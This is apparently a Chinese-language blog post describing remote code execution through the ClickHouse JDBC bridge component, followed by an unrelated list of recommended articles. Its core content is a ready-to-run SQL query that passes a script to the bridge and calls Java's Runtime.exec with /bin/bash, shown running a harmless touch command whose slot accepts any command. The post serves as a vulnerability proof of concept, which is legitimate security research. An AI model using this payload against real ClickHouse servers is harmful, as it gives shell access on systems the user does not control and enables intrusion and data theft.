clickhouse-jdbc-bridge rce

azraelxuemo2024-07-14 9:16

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.

简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接

https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候,如果服务端支持clickhouse-jdbc-bridge

那么可以输入以下命令RCE

复制代码 
SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

然后可以在服务器端/tmp目录下看到1.txt

相关推荐
松涛和鸣6 小时前
DAY49 DS18B20 Single-Wire Digital Temperature Acquisition
linux·服务器·网络·数据库·html
海边的Kurisu6 小时前
苍穹外卖日记 | Day3 公共字段填充、菜品模块
数据库
摆烂z6 小时前
mysql通过binlog恢复数据
数据库·mysql
老邓计算机毕设6 小时前
SSM学期分析与学习行为分析系统c8322(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面
数据库·学习·ssm 框架·学期分析·学习行为分析
学Linux的语莫6 小时前
python创建redis连接池
数据库·redis·缓存
运维有小邓@6 小时前
Log360 的可扩展架构(三):数据流管道
数据库·架构
醇氧6 小时前
【Windows】安装mysql8
数据库·windows·mysql
温暖小土7 小时前
ClickHouse vs Apache Doris:2026年实时OLAP数据库选型深度解析
数据库·数据仓库·clickhouse·apache
专注数据的痴汉7 小时前
「数据获取」全国民用运输机场吞吐量排名(2006-2024)
java·大数据·服务器·数据库·信息可视化
海边的椰子树7 小时前
非常方便的MySQL迁移数据ClickHouse工具
数据库·mysql·clickhouse·迁移
热门推荐
01GitHub 镜像站点02Linux下V2Ray安装配置指南03Labelme从安装到标注:零基础完整指南04Claude Code Skills 实用使用手册05AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南062025年大语言模型技术全景报告07UV安装并设置国内源08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09网站改了域名,如何查找?10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)